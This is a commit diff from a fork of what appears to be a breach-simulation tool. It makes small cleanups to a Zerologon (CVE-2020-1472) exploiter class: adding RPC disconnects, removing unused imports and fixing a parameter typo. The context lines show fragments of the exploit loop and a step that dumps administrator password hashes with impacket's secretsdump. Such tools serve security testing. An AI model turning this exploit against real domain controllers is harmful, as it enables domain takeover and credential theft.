forked from p34709852/monkey
Testing changes
This commit is contained in:
parent
2c2a9eaaae
commit
0866aee2cf
|
@ -3,15 +3,13 @@ Zerologon, CVE-2020-1472
|
|||
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
|
||||
"""
|
||||
|
||||
import io
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
from binascii import unhexlify
|
||||
from typing import List, Optional
|
||||
|
||||
import impacket
|
||||
from impacket.dcerpc.v5 import epm, nrpc, transport
|
||||
from impacket.dcerpc.v5 import nrpc
|
||||
from impacket.dcerpc.v5.dtypes import NULL
|
||||
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
|
@ -57,6 +55,8 @@ class ZerologonExploiter(HostExploiter):
|
|||
LOG.debug("Attempting exploit.")
|
||||
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
|
||||
|
||||
rpc_con.disconnect()
|
||||
|
||||
else:
|
||||
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
|
||||
_exploited = False
|
||||
|
@ -73,12 +73,13 @@ class ZerologonExploiter(HostExploiter):
|
|||
return _exploited
|
||||
|
||||
def is_exploitable(self) -> bool:
|
||||
if self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']:
|
||||
return True
|
||||
if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
|
||||
return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
|
||||
return self.zerologon_finger.get_host_fingerprint(self.host)
|
||||
|
||||
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
|
||||
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
||||
result_exploit_attempt = None
|
||||
for _ in range(0, self.MAX_ATTEMPTS):
|
||||
try:
|
||||
result_exploit_attempt = self.attempt_exploit(rpc_con)
|
||||
|
@ -154,6 +155,10 @@ class ZerologonExploiter(HostExploiter):
|
|||
except Exception as e:
|
||||
LOG.error(e)
|
||||
|
||||
finally:
|
||||
if rpc_con:
|
||||
rpc_con.disconnect()
|
||||
|
||||
def get_admin_pwd_hashes(self) -> str:
|
||||
try:
|
||||
options = OptionsForSecretsdump(
|
||||
|
@ -295,8 +300,9 @@ class ZerologonExploiter(HostExploiter):
|
|||
except Exception as e:
|
||||
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
|
||||
|
||||
def _send_restoration_rpc_login_requests(Self, rpc_con, original_pwd_nthash) -> Optional[bool]:
|
||||
def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> Optional[bool]:
|
||||
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
||||
result_restoration_attempt = None
|
||||
for _ in range(0, self.MAX_ATTEMPTS):
|
||||
try:
|
||||
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
|
||||
|
|
|
@ -1,7 +1,5 @@
|
|||
import io
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
import traceback
|
||||
|
||||
from impacket.examples.secretsdump import (LocalOperations, LSASecrets,
|
||||
|
|
Loading…
Reference in New Issue